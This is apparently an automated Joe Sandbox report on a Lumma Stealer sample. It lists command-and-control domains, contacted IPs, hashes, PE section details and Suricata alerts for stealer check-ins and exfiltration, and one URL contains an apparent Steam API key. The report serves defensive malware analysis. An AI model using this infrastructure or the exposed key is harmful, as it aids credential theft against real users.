                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?CYKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              172.67.157.254
                                                                                                                                                                                                              		lev-tolstoi.comUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              104.102.49.254
                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                              		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1580915
                                                                                                                                                                                                              Start date and time:2024-12-26 13:08:26 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 6m 16s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:4
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:YKri2nEBWE.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:1c4c5cca8b9c930895e0e425563cf07e.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              07:09:21API Interceptor10x Sleep call for process: YKri2nEBWE.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              172.67.157.254GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                      6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                  104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                  • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                  http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • www.valvesoftware.com/legal.htm

                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  lev-tolstoi.comz3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  steamcommunity.comghumRvJGY9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  AiaStwRBdI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  HJVzgKyC0y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  rUfr2hQGOb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  YhF4vhbnMW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  B8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106

                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 104.21.6.3
                                                                                                                                                                                                                                  z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                  • 172.67.165.185
                                                                                                                                                                                                                                  4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.165.185
                                                                                                                                                                                                                                  b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.113
                                                                                                                                                                                                                                  C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.165.185
                                                                                                                                                                                                                                  AKAMAI-ASUStFDKSN3TdH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  ghumRvJGY9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                  Google Authenticator You're trying to sign in from a new location.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 2.19.198.51
                                                                                                                                                                                                                                  xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 23.41.55.10
                                                                                                                                                                                                                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 23.64.163.184
                                                                                                                                                                                                                                  xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 23.194.143.78
                                                                                                                                                                                                                                  telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 104.116.58.253
                                                                                                                                                                                                                                  loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 184.84.140.11
                                                                                                                                                                                                                                  armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 23.64.11.148

                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1tFDKSN3TdH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  ghumRvJGY9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  AiaStwRBdI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  HJVzgKyC0y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  rUfr2hQGOb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  YhF4vhbnMW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  B8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  • 104.102.49.254

                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                  No created / dropped files found

                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Entropy (8bit):6.534121709908588
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                  File name:YKri2nEBWE.exe
                                                                                                                                                                                                                                  File size:2'920'448 bytes
                                                                                                                                                                                                                                  MD5:1c4c5cca8b9c930895e0e425563cf07e
                                                                                                                                                                                                                                  SHA1:d0db3a5c54648e8480652d342dcb2526e4f9ce4d
                                                                                                                                                                                                                                  SHA256:36dd0a1b361b0bb7d38e1bccc954188ac2cd7d030440bbf406da3a27fb5ba098
                                                                                                                                                                                                                                  SHA512:ef183a1158fd51485fe488f6ca15e9e420ee3912aa0cf4856b528a816e705233be1e3d21d94efddcb23478f334ad5ecfbb1e930f3efa8f1109263b258aa9191d
                                                                                                                                                                                                                                  SSDEEP:49152:ocflVj+cDbIdBAa1ISQRln9lXJnxZsP1Gq+uktbWMySNWz7:oYl1+cDbInAa1IBRl9x1by1Gq+3NW1z
                                                                                                                                                                                                                                  TLSH:57D53BD2BA4971CFD88A27788527CF426A5E03F94B2018C3A96974BB7DE3DC115F5C28
                                                                                                                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................`/...........@.........................../.....rt-...@.................................Y@..m..

                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Entrypoint:0x6f6000
                                                                                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                  Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                  jmp 00007FCA1931286Ah
                                                                                                                                                                                                                                  movd mm5, dword ptr [eax+eax]
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  jmp 00007FCA19314865h
                                                                                                                                                                                                                                  add byte ptr [ebx], al
                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], dl
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [ebx], al
                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add ecx, dword ptr [edx]
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add eax, 0000000Ah
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  push es
                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax+00h], ah
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  or al, 80h
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add ecx, dword ptr [edx]
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  xor byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                  0x10000x520000x264006a68a52c44aa8d43d9111d2390ac0041False0.9995021446078431data7.9818005594578265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .rsrc 0x530000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  awkvfzgs0x550000x2a00000x29f200f1feebe07c2c2aaaa399af1976eb1c7bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  nvoqryrp0x2f50000x10000x600f627e82837f64e62ecccfd72bfa283b1False0.552734375data4.916701371159365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .taggant0x2f60000x30000x22000507998ed3fa0504a22d7319a8dac258False0.08444393382352941DOS executable (COM)1.0968012805185083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                  kernel32.dlllstrcpy

                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                  2024-12-26T13:09:22.355457+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.5621221.1.1.153UDP
                                                                                                                                                                                                                                  2024-12-26T13:09:22.593628+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.5493921.1.1.153UDP
                                                                                                                                                                                                                                  2024-12-26T13:09:22.732990+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.5631011.1.1.153UDP
                                                                                                                                                                                                                                  2024-12-26T13:09:22.875255+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.5621551.1.1.153UDP
                                                                                                                                                                                                                                  2024-12-26T13:09:23.026058+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.5557011.1.1.153UDP
                                                                                                                                                                                                                                  2024-12-26T13:09:23.166540+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.5508141.1.1.153UDP
                                                                                                                                                                                                                                  2024-12-26T13:09:23.312825+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.5567561.1.1.153UDP
                                                                                                                                                                                                                                  2024-12-26T13:09:23.453183+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.5573091.1.1.153UDP
                                                                                                                                                                                                                                  2024-12-26T13:09:25.225746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.102.49.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:26.082788+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549704104.102.49.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:27.876648+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:28.651555+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:28.651555+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:29.989306+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:30.761854+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:30.761854+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:32.689522+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:37.545483+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:40.569369+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549717172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:43.592013+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549729172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:44.390705+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549729172.67.157.254443TCP
                                                                                                                                                                                                                                  2024-12-26T13:09:46.195558+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549736172.67.157.254443TCP
